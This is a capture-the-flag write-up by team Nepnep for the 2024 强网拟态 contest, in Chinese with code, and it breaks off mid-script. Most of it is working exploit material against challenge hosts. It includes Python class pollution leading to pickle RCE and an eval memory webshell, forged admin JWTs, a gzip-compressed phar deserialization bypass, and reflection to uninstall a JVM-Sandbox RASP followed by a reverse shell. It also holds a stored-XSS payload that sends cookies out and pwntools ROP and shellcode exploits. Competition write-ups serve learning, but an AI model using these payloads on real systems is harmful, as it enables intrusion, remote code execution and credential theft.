2024 强网拟态 – Nepnep -WP
队伍名称:Nepnep
最终排名:1st🏆
感谢队里师傅们的辛苦付出!如果有意加入我们团队的师傅,欢迎发送个人简介至:[email protected]
由于本文篇幅过长,如有需要 WP PDF 版本的师傅,请向后台发送“2024 强网拟态 WP”即可获取 WP。
Web:
ez_picker
/register 存在 Python 类污染(写法上常被叫作“原型链污染”):下面的 JSON 经由 `__init__.__globals__` 覆盖模块全局变量 safe_modules、safe_names 与 secret_key,为后续的 pickle 反序列化 RCE 和 JWT 伪造铺路
JSON {"username": 1, "password": 1, "__init__": {"__globals__": {"safe_modules": ["os", "builtins"], "safe_names": ["eval", "popen"], "secret_key": 111}}}
import pickle

# Gadget for ez_picker: when the server unpickles this object, __reduce__
# makes the unpickler call eval() on a one-liner that registers a /shell
# route, which runs the "cmd" query parameter through os.popen (a memory
# webshell). eval/popen/os are only reachable because safe_modules and
# safe_names were polluted first (see the /register payload above).
PAYLOAD = (
    'app.add_route(lambda request: __import__("os").popen('
    'request.args.get("cmd")).read(),"/shell", methods=["GET","POST"])'
)


class A():
    """Pickle gadget: deserialising an instance evaluates PAYLOAD."""

    def __reduce__(self):
        # (callable, args) -> the unpickler executes eval(PAYLOAD)
        return (eval, (PAYLOAD,))


a = A()
b = pickle.dumps(a)
print(b)
# Persist the byte stream as 1.pkl for the upload step.
with open('1.pkl', 'wb') as fh:
    fh.write(b)
import time

import jwt

from key import secret_key  # local key.py; must hold the value planted via /register (111 above)

# Forge an admin token. The polluted secret is an integer, hence str() before
# signing; presumably the server verifies with the same (now known) value.
ttl_seconds = 60 * 5
data = {"user": 1, "role": "admin", "exp": int(time.time()) + ttl_seconds}
token = jwt.encode(data, str(secret_key), algorithm='HS256')
print(token)
上传pkl文件写内存马
import requests

# Upload endpoint of the target instance
url = 'http://web-10c5ac0445.challenge.xctf.org.cn/upload'
# Pickle payload produced by the generator script above
file_path = '1.pkl'

# Forged admin JWT. The jwt script gives it a 5-minute lifetime, so regenerate
# it and replace the Cookie value if the upload is rejected. Origin/Referer
# name a different instance host than `url`; the server apparently ignores them.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0',
    'Accept': '*/*',
    'Origin': 'http://web-6f5b38ec4e.challenge.xctf.org.cn',
    'Referer': 'http://web-6f5b38ec4e.challenge.xctf.org.cn/upload',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
    'Cookie': 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoxLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3MjkzMjE0ODN9.qe64g5NTlukRKtTs3aRzzl7P1zIkCUz6F7m-L58MphQ',
    'Connection': 'close',
}

# Multipart upload of the pickle; the server-side loads it (-> __reduce__ -> eval)
with open(file_path, 'rb') as fh:
    upload = {'file': ('1.pkl', fh, 'application/octet-stream')}
    response = requests.post(url, headers=headers, files=upload)

print(response.status_code)
print(response.text)
/shell?cmd=cat /tr3e_fl4g_1s_h3re_lol
capoo
任意文件读取读源码 showpic.php
源码
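<?php
// Challenge source recovered through the arbitrary file read in showpic.php.
// NOTE(review): the listing was damaged in extraction (curly quotes, a stray
// "9" before file_get_contents, and one level of backslashes dropped from the
// regex). Quotes and the regex escapes are restored here; the `\|` spot could
// also have been `\|\|`, so check the original before relying on the banlist.
class CapooObj {
    // Deserialisation sink: file_exists() on a phar:// path unserialises the
    // archive metadata, which ends here with system($this->action).
    public function __wakeup() {
        $action = $this->action;
        $action = str_replace("\"", "", $action);
        $action = str_replace("'", "", $action);
        // Blacklist only (no whitelist). Space, `.`, `*`, `?`, brackets and the
        // usual file-reading commands are banned; `$` and `diff` are not.
        $banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|~|`|\r|\n|\t| |\^|ls|\.|tail|watch|wget|\||;|:|\(|\)|\{|\}|\*|\?|\[|\]|@|\\|=|<)/i";
        if(preg_match($banlist, $action)){
            die("Not Allowed!");
        }
        system($this->action);
    }
}

header("Content-type:text/html;charset=utf-8");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['capoo'])) {
    $file = $_POST['capoo'];
    if (file_exists($file)) {
        // Arbitrary file read (and the phar:// trigger): the file is returned
        // base64-encoded inside the <img> below.
        $data = file_get_contents($file);
        $base64 = base64_encode($data);
    } else if (substr($file, 0, strlen("http://")) === "http://") {
        // Server-side fetch of attacker-controlled content, written to disk.
        $data = file_get_contents($_POST['capoo'] . "/capoo.gif");
        // Plain substring check: "PILER" catches the __HALT_COMPILER() every
        // uncompressed phar stub contains, but not a gzip-compressed phar.
        if (strpos($data, "PILER") !== false) {
            die("Capoo piler not allowed!");
        }
        file_put_contents("capoo_img/capoo.gif", $data);
        die("Download Capoo OK");
    } else {
        die('Capoo does not exist.');
    }
} else {
    die('No capoo provided.');
}
?>
<!-- the inline PHP that echoes $base64 into the src attribute appears to have been lost in extraction -->
<img src='data:image/gif;base64, ' />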
远程写一个 phar 文件。题目对下载回来的内容做 `PILER` 子串检测(正好命中未压缩 phar stub 中必须出现的 `__HALT_COMPILER()`),把整个 phar 用 gzip 压缩后该字符串不再以明文出现,而 PHP 的 phar:// 包装器能透明读取 gzip 压缩的 phar,于是绕过检测
Phar文件
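<?php
highlight_file(__FILE__);

// Local mirror of the target's class: only the class name and the `action`
// property matter, because the metadata is unserialised into the server's
// CapooObj, whose __wakeup() hands `action` to system().
class CapooObj {
    var $action = '';
}

@unlink('test.phar');
$phar = new Phar('test.phar');   // file name must end in .phar while building
$phar->startBuffering();
// Stub: GIF magic so the file passes as an image, then the mandatory
// __HALT_COMPILER(); terminator. NOTE(review): the PHP tag inside the stub was
// swallowed by the page rendering; this is the standard form of that line.
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
$o = new CapooObj();
$o->action = 'whoami';           // command executed by the target's __wakeup()
$phar->setMetadata($o);          // serialised object stored as archive metadata
$phar->addFromString("test.txt", "m1xi@n");  // the archive needs at least one entry
$phar->stopBuffering();
// Next (see below): gzip the archive to hide the "PILER" substring, serve it as
// capoo.gif, let the target download it, then trigger with a phar:// path
// (presumably phar://capoo_img/capoo.gif) as the `capoo` parameter.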
gzip 压缩后改名为 gif 放到自己的服务器上,提交 capoo=http://ip:port/# —— 末尾的 `#` 让题目拼接的 `/capoo.gif` 落进 URL fragment(不会随请求发出);下载落地为 capoo_img/capoo.gif 后,再用 phar:// 路径作为 capoo 参数访问,触发反序列化
虽然会报错,但 `__wakeup` 里的 system 已经执行;cat/more/less/tac/head/nl/od 等读文件命令都在黑名单里,`diff` 不在,于是用 diff 读文件拿 flag
读 flag-33ac806f
OnlineRunner
题目想要在不 import 任何类的情况下完成攻击。这里应该有两个思路
1、直接不 import 打,尝试如下 payload 失败
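// First attempt: spawn a shell command through Runtime and echo its stdout.
// Fully-qualified names are used because the challenge does not let us add
// import statements. This one failed (the author later attributes the block
// to the sandbox agent found below).
try {
    Process process = java.lang.Runtime.getRuntime().exec("echo 123");
    // try-with-resources: the original never closed the reader
    try (java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(process.getInputStream()))) {
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
    }
    process.waitFor();
} catch (Exception e) {
    e.printStackTrace();
}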
作者当时猜测是因为题目的 Main 类没有声明抛出异常(后文发现更可能是 sandbox agent 在拦截)。目前可以使用这个 Payload 任意文件读取
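// Arbitrary file read primitive. /proc/1/cmdline reveals how the JVM was
// launched (flags, agent path, jar path); its arguments are NUL-separated, so
// they come back glued into one "line" - swap the NULs for spaces so the
// output is readable. try-with-resources replaces the unconditional close().
try (java.io.BufferedReader br = new java.io.BufferedReader(
        new java.io.FileReader("/proc/1/cmdline"))) {
    String line;
    while ((line = br.readLine()) != null) {
        System.out.println(line.replace('\0', ' '));
    }
} catch (java.io.IOException e) {
    e.printStackTrace();
}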
/proc/1/cmdline 的内容(参数以 NUL 分隔,这里补回空格): `java --add-opens=java.base/java.lang=ALL-UNNAMED -javaagent:/home/ctf/sandbox/lib/sandbox-agent.jar -jar /app/app.jar --server.port=80`
列目录
// Directory listing primitive (java.io.File is not blocked by the agent).
java.io.File root = new java.io.File("/");
java.io.File[] entries = root.listFiles();
if (entries == null) {
    System.out.println("The directory does not exist or is not a directory.");
} else {
    for (java.io.File entry : entries) {
        // isFile()/isDirectory() are mutually exclusive, so order is irrelevant
        if (entry.isDirectory()) {
            System.out.println("Directory: " + entry.getName());
        } else if (entry.isFile()) {
            System.out.println("File: " + entry.getName());
        }
    }
}
然而这里最终的目标还是 RCE,以当前的 payload 没有办法很好地拿到 app.jar 的内容,于是用这个 payload 来看看 jar 包中都有什么,一步步想办法去读题目的实例类
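// Enumerate the entries of the application jar without extracting it, to see
// which challenge classes are worth reading next. try-with-resources closes
// the stream even when getNextEntry() throws (the original leaked it then).
try (java.util.zip.ZipInputStream zis = new java.util.zip.ZipInputStream(
        new java.io.FileInputStream("/app/app.jar"))) {
    java.util.zip.ZipEntry entry;
    while ((entry = zis.getNextEntry()) != null) {
        System.out.println(entry.getName());
        zis.closeEntry();
    }
} catch (java.io.IOException e) {
    e.printStackTrace();
}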
发现这里还有个 agent,直接 Runtime 打不行,大概率就是因为有这个 rasp,下载 agent
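// Exfiltrate the sandbox agent jar as base64 chunks, one quoted string per
// line, so the output can be pasted into a Python list and reassembled.
// Fix: the original encoded the whole 1024-byte buffer on every iteration, so
// the final (short) chunk carried stale bytes from the previous read and the
// rebuilt jar had trailing garbage. Only the bytesRead prefix is encoded now.
java.io.File file = new java.io.File("/home/ctf/sandbox/lib/sandbox-agent.jar");
try (java.io.BufferedInputStream bis = new java.io.BufferedInputStream(
        new java.io.FileInputStream(file))) {
    byte[] buffer = new byte[1024];
    int bytesRead;
    while ((bytesRead = bis.read(buffer)) != -1) {
        byte[] chunk = java.util.Arrays.copyOf(buffer, bytesRead);
        System.out.print('"');
        System.out.print(java.util.Base64.getEncoder().encodeToString(chunk));
        System.out.println("\",");
    }
} catch (java.io.IOException e) {
    e.printStackTrace();
}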
JSON import base64 data = [“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”, “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”, “Ym94L2FnZW50L0FnZW50TGF1bmNoZXIuY2xhc3OtWgl8VNXVP2cykzeZvJAwASQgEpA1q4KghEWSkJBANjMBDKDxkbwkA5OZdGYCpLZudana2iq2Fdxaa0sX2yK0Q4AK2r22drG2dret3fddbal8/3Pfm5mXZNj69Se+9+69557tnvVOnn396HEiWumaoJGLqbQ7MlBphILbjG1G5fadA5UxI9yzLbK70ugzw/HKank2GUPh7n4z6iM3eTTK1kkjL1PBdmOnURkywn2Vrdu2m91xpuwVwXAwvoopa8HCjTnko1yNdJ3yaAKTrsCDkcr6YMhkyouZg0bUiEeitf1GlIlr/WCrQKeJ5Ge6YMDYYdZGwt1GfFMw3o+vWNwIx2NM8xc0pekG4tFguG957cLxc34Ch8LCZJ2m0AVMOSmCTP5M8C4qEurTmJZlojF+KiPVLCrygfQMnS6imUwT+8x4wFJpbW9fmxHvZ5qXAX1GXG6aJRzNZroiw5ZzROKhAi/NZfKoE80Bb/N1WiAayW2q3tBS29DV3LqmTngu0amUynBS8Ui9acSHomazMch08enZHYoHQ5UAWi7bK3SqpEuYtKAcVijEFFgwBsyBSICiQwNiZI2pTyMejISTyMOmLEF9ke4dZry6pydqxmLLvbQIdmbE40Z3v1C9TKcltBRMQ9EtxoAZGzS6zTTTKdIZdCPbr9BpmWz3YntHZIcZlsnlOq2glTi8XdFg3KxWtNrN2FAIJl57TidxJgnEM5iu1Gm1HEJBe11gQ1NHV31jU11XW3VHgw82WyMuVss0OZPqNwpEnU71tBaaMHcHY+IX8LjNstCo0zq1EIyJo8lUk07NMuXtNsKbRCKNWpmmpTG3D4XjwQGzbne3OSgn4Kdsukosr51pts2C7biZ9dhCNRptgF85QRUpBI0O2iTiXI3lMbg2L9zopc04u7mx5cl/Ph9tpWs0ulanLrouyWZGTcKCcWoNkZg6eKZJCzIyt5W26dRNPbBMgLdFonGlrUYf9VKfRv06BWk7Dju9tTEcN/tMxAltpxEaMlt7maYsaHQityGAPUQDGoV1itDgqJBokcc59EaiA0Y8c1DZ4piyYmhm/XZQVKcYSYQ1BgfNMGQpcaKTEBow3zBkhrtTJwQlWyeg9u/UaZcEbU9vaCjWLzPDOr1RzXSHIjGYxJuYCtMYO/qjkV3GNjGg6+kGnW6kmxCzjZ6ewNDgoCjfBA9TnTykdsBCNboliQ1sNLamLEtM5VaxhpvEB27X6Q56K8zcTjq1ISMWa4oYPWZURZ78MT6cS3fR3Rq9Tae30z1gZ9QqrKE7ghCCwLLeHB7jO0nlbhYU79TpXroPRgBzGBONMxyCPQ==”, “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”, “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”, “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”, 
“6PEEfbDM/xH7i/GGqTxhvzaVJuigheFTLlJe6VbyzAMHRAcpjw7BKD4JcxiBjEeolI5Cpqeoho7DHE44nKbZligPEj0LORjwi/kr/FWH01gzz9kyIuifpMLRIpbI37hYIrqegU7z4FST4dyLm/EYacHjWJUbz+NVntJj9Eyn+FmRZ4Q+C087TF84Ql92UZlMfH2EnoczZPu/k6DvVmlFmv8HHqigM8sfgl/hIcrwKEcrcmOmHBNPVHmx4SHZkFOUM05nVT5M/sieLPLZs0/TSwn66dLcybn7qAEAP7fIFGlC5tmAArXpeJVHi9r304wqHcCPjcW2qUg/gflfjqey9UCVR5zZ/+siz2H67QmY0UfoeZj09Sh3ssXW7aO7RQI97MNDX0WUeo4K6BsIqM+jNvkW1Ps8FPxdWkTfpyV4V9FLsKifwYtfRkT8JcXpN/Qm+i28+Xfw1z/CE/4KKn+nT9M/6Gv0T+z+Fyi+Qi/Sq/R7eo3+RKfoFfVbEHM2nWKN3ZzDHmUW9yCcv0hT+Wv8dZK/EfsLXwAD8YDmczCQb+Bwa+lz/E0YiAbaD/Hz/C2YRBzmIEaTA/o38AuY84GLbfRj/jblcg7p/B3g84hZqIhM6suK0h4uUEboQqTJ5RfxlQXdePi7+HIrIxRTtag+B6oWrefE1AUbojkpw2ygrFMQU9foLo2eTUYW69/3NHpcI7f1ZBVjik6JXGOA1YpdvX0PMrwKDVqJa6udU6dzCUqwkgT94REqKPH/OUF/3Ueaez+5s55IxRX5IzXiYsrmWciCs1EDFTsS7nT+vvicYtpDrqLVkpdeT1GqsaspKQH+OR63SuA8b1QJMApfruCTn+FsfJsB5Eri20taCfCVHhjDawlpXIqjKsNRlTiyuY1bff1AlYJCRRMqoi6f/G2c5fh8FRBJvr7xGL3WeZj+3QR6J/eSp/RAif9Ugrm57Pg+GZW1lB9f6s5a6pnsmex+jK4qn+xZJD6voLP3U1VRdiF7sEH8/7jnvbSwSMtahNV9NLNIcy9KwvlLZV5mrLh+q4f3n/q4ksxyqXrEdeJL0AItxilchtR/BQx7GerJKpqJBLYEBe5KvhKRr5rWcQ1t4FrqQi1mch3181raBZg38zqljcug2XUovH7IP4L0S6iGfwxtSPa40S47vIAX02bUjn38EuDSEVStwVAt7S0g7SRNhOWdpDyNf/I6efFkRNULoNKTNB+j12jCq3AMyxB/iuOcwRfZKeQunItE7lliiDNKjsB7aR9NKim100mobIR9OOKytCKsI26lCerHpauQNFscKWAW/8zySHy9bGf1Wfxz8ciUAAoq5Wk4/ply/DZ/vwB/s5DyLXObrewGZeVBzg==”, “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”, “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”] with open(“agent.jar”, “ab+”) as f: for i in data: f.write(base64.b64decode(i))
对 agent.jar 进行审计,发现源自 JVM-SANDBOX 项目,其启动类中有一个 uninstall 方法,用来按命名空间卸载模块。当前 RASP 的默认命名空间是 default,于是尝试直接这样卸载 RASP,payload 如下,之后就可以直接执行命令。这也是该 RASP 的一个设计缺陷:被沙箱的业务代码能通过反射拿到 agent 自身的 `AgentLauncher` 类并调用 `uninstall(String)`,沙箱没有把自己的卸载入口挡在受保护代码之外。
// Disarm the RASP from inside: JVM-Sandbox's AgentLauncher exposes a static
// uninstall(String namespace), and the default module namespace is "default".
try {
    Class<?> launcher = Class.forName("com.alibaba.jvm.sandbox.agent.AgentLauncher");
    System.out.println(launcher);
    // debug output: which class our snippet runs in
    String className = Thread.currentThread().getStackTrace()[1].getClassName();
    System.out.println("当前类名: " + className);
    java.lang.reflect.Method uninstall = launcher.getDeclaredMethod("uninstall", String.class);
    uninstall.invoke(null, "default");   // static method, no receiver
    System.out.println("Sandbox 卸载成功!");
} catch (Exception e) {
    System.err.println("调用卸载方法时出错: " + e.getMessage());
    e.printStackTrace();
}
测试了半天的回显,发现可以直接bash弹shell了
Spreader
Content分两次上传
// Stored-XSS payload for Spreader (the surrounding <script> tag did not
// survive extraction). It posts the viewer's cookies to the challenge's own
// /store endpoint. The trailing /* opens a comment that swallows whatever
// follows in the stored content; the second upload presumably closes it.
const exfil = {
    method: 'POST',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: encodeURIComponent(document.cookie)
};
fetch('/store', exfil);/*<br><br><br>*/
拿完privileged的Cookies,再以privileged的身份上传上述的Payload,再拿admin的Cookies。
Pwn:
qwen
pwn1:
栈溢出修改error_trigger函数指针为后门
触发error到后门
通过open(“/proc/self/maps”),泄露libc和pie
回到主程序,继续修改函数指针,观察劫持控制流的现场,并抬栈到buf,打rop
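from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# Load the binaries once instead of on every retry of the loop below.
elf = ELF('./pwn')
libc = ELF('./libc-2.27.so')

MOVE_PROMPT = '请输入下棋的位置(行 列):'


def play_five(p):
    """Make the five moves that reach the overflowing "say something" prompt."""
    for pos in ('0 0', '0 1', '0 2', '0 3', '0 4'):
        p.sendlineafter(MOVE_PROMPT, pos)


while True:
    #p = process('./pwn')
    p = remote('pwn-848a8a75eb.challenge.xctf.org.cn', 9999, ssl=True)
    play_five(p)
    # Partial overwrite: only the low two bytes of the error_trigger function
    # pointer are replaced, pointing it at the backdoor (PIE+0x1508). The
    # unknown PIE nibble makes this probabilistic, hence the retry loop.
    p.sendafter('Is there anything you want to say?', b'a' * 0x8 + b'\x08\x15')
    p.sendlineafter('Do you want to end the game [Y/N]', 'N')
    try:
        p.sendlineafter(MOVE_PROMPT, '14 15')   # triggers error_trigger
        # 1804289383 is the first value glibc rand() returns when srand() was never called
        p.sendlineafter('Please enter the administrator key', '1804289383')
        sleep(0.2)
        # The backdoor opens a file for us: /proc/self/maps leaks PIE and libc.
        p.sendline('/proc/self/maps')
        p.recvuntil('The debugging information is as follows >>\n')
        pie = int(p.recvline()[:12], 16)
        print('[*] pie = ', hex(pie))
        # gadgets in the binary (not all are used by the final chain)
        pop_rdi_ret = pie + 0x19b3
        leave_ret = pie + 0x1944
        ret = pie + 0x1945
        call_read = pie + 0x18ad
        p.recvline()
        p.recvline()
        libc_base = int(p.recvline()[:12], 16)
        add_rsp_0x68_ret = libc_base + 0x000000000010fc5e
        system_addr = libc_base + libc.symbols['system']
        binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
        print('[*] libc = ', hex(libc_base))
        '''
        0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
        constraints:
          rsp & 0xf == 0
          rcx == NULL

        0x4f302 execve("/bin/sh", rsp+0x40, environ)
        constraints:
          [rsp+0x40] == NULL

        0x10a2fc execve("/bin/sh", rsp+0x70, environ)
        constraints:
          [rsp+0x70] == NULL
        '''
        ogg = libc_base + 0x4f2a5   # one_gadget alternative, unused

        # Second round: overwrite the pointer with a stack-lifting gadget so
        # execution lands in our buffer, then pop_rdi -> "/bin/sh" -> system.
        play_five(p)
        p.sendafter('Is there anything you want to say?',
                    b'a' * 0x8 + p64(add_rsp_0x68_ret) + p64(0xdeadbeef)
                    + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr))
        p.sendlineafter('Do you want to end the game [Y/N]', 'N')
        #gdb.attach(p, 'b *$rebase(0x1022)\nc')
        p.sendlineafter(MOVE_PROMPT, '14 15')
        break
    except Exception:
        # A wrong PIE guess crashes the target (EOF); reconnect and retry.
        # Catch Exception, not everything, so Ctrl-C still stops the loop.
        p.close()
        continue

p.sendline('cd home/ctf/')
p.interactive()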
pwn2:
一个压缩程序,可以将flag打包成可读文件,打包后直接cat即可
base64解码过后可以得到flag
ezcode
先通过 mprotect 将 shellcode 所在页的权限改成 7(PROT_READ|PROT_WRITE|PROT_EXEC,可读可写可执行),再通过 jmp 回到 syscall,并提前布置好参数来实现 read,读 0xf 大小
通过第一次read,布置好第二次read,并jmp跳转过去,第二次read长度可控
最后orw
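from pwn import *
import json

context(os='linux', arch='amd64', log_level='debug')

p = process('./pwn')
elf = ELF('./pwn')
#p = remote("pwn-6bc8a8d329.challenge.xctf.org.cn", 9999, ssl=True)

'''
Stage 1 - must fit the initial size limit:
//mprotect(0x9998000, _, 7)   13 bytes
mov ax, 0xa
shl edi, 12
mov dx, 0xf
syscall
//read                        9 bytes
xor edi, edi
shl esi, 12
xor eax, eax
jmp short            ; back to the syscall above -> read(0, buf, 0xf)
'''
gdb.attach(p, 'b *$rebase(0x15e0)\nb *$rebase(0x18a6)\nc')

payload = '66b80a00c1e70c66ba0f000f05'   # mprotect(page, _, 7): make it rwx
payload += '31ffc1e60c31c0ebf5'          # read(0, page, 0xf) by jumping back
# json.dumps produces exactly {"shellcode": "<hex>"}, the shape the server expects
p.sendlineafter(' input:', json.dumps({"shellcode": payload}))
print("[*] length is ", hex(len(payload)))

'''
Stage 2 (0xf bytes): re-issue read with a larger length
xor eax, eax
mov dx, 0xf0
syscall
'''
# 8 bytes of code, NOP-padded to 0xd, then jmp short -0xf back to the syscall
p.send(b'1\xc0f\xba\xf0\x00\x0f\x05'.ljust(0xd, b'\x90') + b'\xeb\xf1')

# Stage 3: move rsp onto the rwx page, then open/read/write the flag.
payload = (shellcraft.open('/flag')
           + shellcraft.read('rax', 0x9998f00, 0x100)
           + shellcraft.write(1, 0x9998f00, 0x100))
p.sendline(b'a' * 8 + asm('shl esp, 12; add esp, 0x200') + asm(payload))
p.interactive()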
signin_revenge
vuln 函数中存在 0x30 字节的栈溢出,第一次利用栈溢出劫持控制流到 puts 函数泄露 libc 地址,并回到 vuln;第二次利用栈溢出劫持控制流到 read(脚本里调用的是 read@plt,下一题 signin 同一位置用的是 gets),向 data 段读入字符串和 ROP 并最终回到 vuln;第三次利用栈溢出劫持控制流、使用 ROP:pop_rbp + data 段地址 + leave_ret 实现栈迁移,最终 orw 读出 flag;
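from pwn import *
import sys

# Escape sequences ("\x7f", b"\x00", ...) were flattened by the page
# extraction; they are restored here, otherwise none of the recvuntil()
# markers would ever match.
binary = "./vuln"
if len(sys.argv) == 1 or sys.argv[1] == 'l':
    sh = process(binary)
elif sys.argv[1] == 'r':
    sh = remote("pwn-6fc638b866.challenge.xctf.org.cn", 9999, ssl=True)
elf = ELF(binary)


def ru(string):
    sh.recvuntil(string)


def dbg():
    """Attach gdb and pause, local runs only."""
    if len(sys.argv) > 1 and sys.argv[1] == 'r':
        return
    gdb.attach(sh)
    pause()


def sl(content):
    sh.sendline(content)


def itr():
    sh.interactive()


context.log_level = 'debug'


# Template helpers (unused by this exploit). Each falls back to a second
# marker byte when the first recvuntil() times out and yields 0.
def get_heap():
    res = u64(sh.recvuntil("\x55", timeout=0.2)[-6:].ljust(8, b'\x00'))
    if res == 0:
        res = u64(sh.recvuntil("\x56", timeout=0.2)[-6:].ljust(8, b'\x00'))
    return res


def get_libc():
    res = u64(sh.recvuntil("\x7f", timeout=0.2)[-6:].ljust(8, b'\x00'))
    if res == 0:
        res = u64(sh.recvuntil("\x7e", timeout=0.2)[-6:].ljust(8, b'\x00'))
    return res


def get_tcache():
    return u64(sh.recvuntil("\x05")[-5:].ljust(8, b"\x00"))


def func():
    """Three 0x30-byte overflows of vuln(): leak libc, stage ROP in .data, pivot."""
    pop_rdi = 0x0000000000401393
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    vuln = 0x4012C0
    #ru("lets move and pwn!")

    # 1) leak puts@libc and return to vuln for another overflow
    pay = b'a' * 0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
    sl(pay)
    puts = u64(sh.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
    print("puts :", hex(puts))
    libc = ELF("./libc.so.6")
    base = puts - libc.sym['puts']
    print("base :", hex(base))
    _open = base + libc.sym['open']
    pop_rsi = base + 0x000000000002601f
    flag = base + 0x0000000000012efb
    print("flag :", hex(flag))
    pop_rdx = base + 0x0000000000142c92

    # 2) read@plt into .data (0x404088): rdi/rdx are whatever the previous
    #    call left behind, which was good enough in practice
    pay = b'a' * 0x108 + p64(pop_rsi) + p64(0x404088) + p64(elf.plt['read']) + p64(vuln)
    sl(pay)
    # .data layout: "flag\0" at 0x404088, followed by the orw chain
    pay = b"flag" + b'\x00' * 4
    pay += p64(pop_rdi) + p64(0x404088) + p64(pop_rsi) + p64(0) + p64(_open)
    pay += (p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(0x404088 + 0x200)
            + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']))
    pay += p64(pop_rdi) + p64(0x404088 + 0x200) + p64(puts_plt)
    sl(pay)

    # 3) stack pivot: rbp = 0x404088, leave;ret runs the chain staged above
    leave_ret = 0x4012EE
    pop_rbp = 0x000000000040117d
    dbg()
    pay = b'a' * 0x108 + p64(pop_rbp) + p64(0x404088) + p64(leave_ret)
    sl(pay)
    sh.interactive()


if __name__ == "__main__":
    func()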
signin
首先是输入name,然后有一个关于随机数的校验,由于输入name存在溢出且输入之后存在一个printf %s的输出反馈,可以利用这个泄露随机数的时间种子,从而绕过;然后进入到主程序是一个菜单堆,且add功能中存在一个和signin_revenge中vuln函数逻辑一样的O_o漏洞函数,利用方法完全一致,不再赘述;
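from pwn import *
import sys
from ctypes import CDLL

# Escape sequences ("\n", "\x7f", b"\x00", ...) were flattened by the page
# extraction and are restored here; without them the seed leak and every
# recvuntil() marker would fail.
binary = "./vuln"
if len(sys.argv) == 1 or sys.argv[1] == 'l':
    sh = process(binary)
elif sys.argv[1] == 'r':
    sh = remote("pwn-aaafe75338.challenge.xctf.org.cn", 9999, ssl=True)
elf = ELF(binary)


def ru(string):
    sh.recvuntil(string)


def dbg():
    """Attach gdb and pause, local runs only."""
    if len(sys.argv) > 1 and sys.argv[1] == 'r':
        return
    gdb.attach(sh)
    pause()


def sl(content):
    sh.sendline(content)


def itr():
    sh.interactive()


context.log_level = 'debug'


# Template helpers (unused by this exploit). Each falls back to a second
# marker byte when the first recvuntil() times out and yields 0.
def get_heap():
    res = u64(sh.recvuntil("\x55", timeout=0.2)[-6:].ljust(8, b'\x00'))
    if res == 0:
        res = u64(sh.recvuntil("\x56", timeout=0.2)[-6:].ljust(8, b'\x00'))
    return res


def get_libc():
    res = u64(sh.recvuntil("\x7f", timeout=0.2)[-6:].ljust(8, b'\x00'))
    if res == 0:
        res = u64(sh.recvuntil("\x7e", timeout=0.2)[-6:].ljust(8, b'\x00'))
    return res


def get_tcache():
    return u64(sh.recvuntil("\x05")[-5:].ljust(8, b"\x00"))


def attack():
    """Same three-overflow orw chain as signin_revenge, against the add() path."""
    pop_rdi = 0x0000000000401893
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    vuln = 0x4013C0
    #ru("lets move and pwn!")

    # 1) leak puts@libc and return to vuln
    pay = b'a' * 0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
    sl(pay)
    puts = u64(sh.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
    print("puts :", hex(puts))
    libc = ELF("./libc.so.6")
    base = puts - libc.sym['puts']
    print("base :", hex(base))
    _open = base + libc.sym['open']
    pop_rsi = base + 0x000000000002601f
    pop_rdx = base + 0x0000000000142c92
    #dbg()

    # 2) gets() into .data (0x404108); the read@plt variant also works:
    #pay = b'a'*0x108+p64(pop_rsi)+p64(0x404108)+p64(elf.plt['read'])+p64(vuln)
    pay = b'a' * 0x108 + p64(pop_rdi) + p64(0x404108) + p64(base + libc.sym['gets']) + p64(vuln)
    sl(pay)
    # .data layout: "flag\0" at 0x404108, then open/read/puts, then a write() tail
    pay = b"flag".ljust(8, b'\x00')
    pay += p64(pop_rdi) + p64(0x404108) + p64(pop_rsi) + p64(0) + p64(_open)
    pay += (p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(0x404108 + 0x200)
            + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']))
    pay += p64(pop_rdi) + p64(0x404108 + 0x200) + p64(puts_plt) + p64(vuln)
    # Fallback write(1, buf, 0x100) in case puts stops at a NUL. The original
    # omitted pop_rsi here, so the buffer address was executed as a return
    # address; harmless in practice because puts had already printed the flag.
    pay += (p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x404108 + 0x200)
            + p64(pop_rdx) + p64(0x100) + p64(base + libc.sym['write']) + p64(vuln))
    sl(pay)

    # 3) stack pivot into the staged chain
    leave_ret = 0x4013EE
    pop_rbp = 0x000000000040127d
    pay = b'a' * 0x108 + p64(pop_rbp) + p64(0x404108) + p64(leave_ret)
    sl(pay)


def func():
    """Leak the srand() seed via the name overflow, pass the 100 checks, reach add()."""
    h = CDLL("./libc.so.6")
    # The name buffer overflows into the 4-byte seed; printf("%s") then echoes
    # our newlines followed by the seed bytes.
    sh.send("\n" * (0x16 - 0x8))
    ru("User Name")
    ru("\n" * (0x16 - 0x8))
    seed = u32(sh.recv(4))
    print("seed :", hex(seed))
    # Replay the target's rand() sequence with the same libc
    h.srand(seed)
    for _ in range(100):
        num = h.rand() % 100 + 1
        #print("rand :", num)
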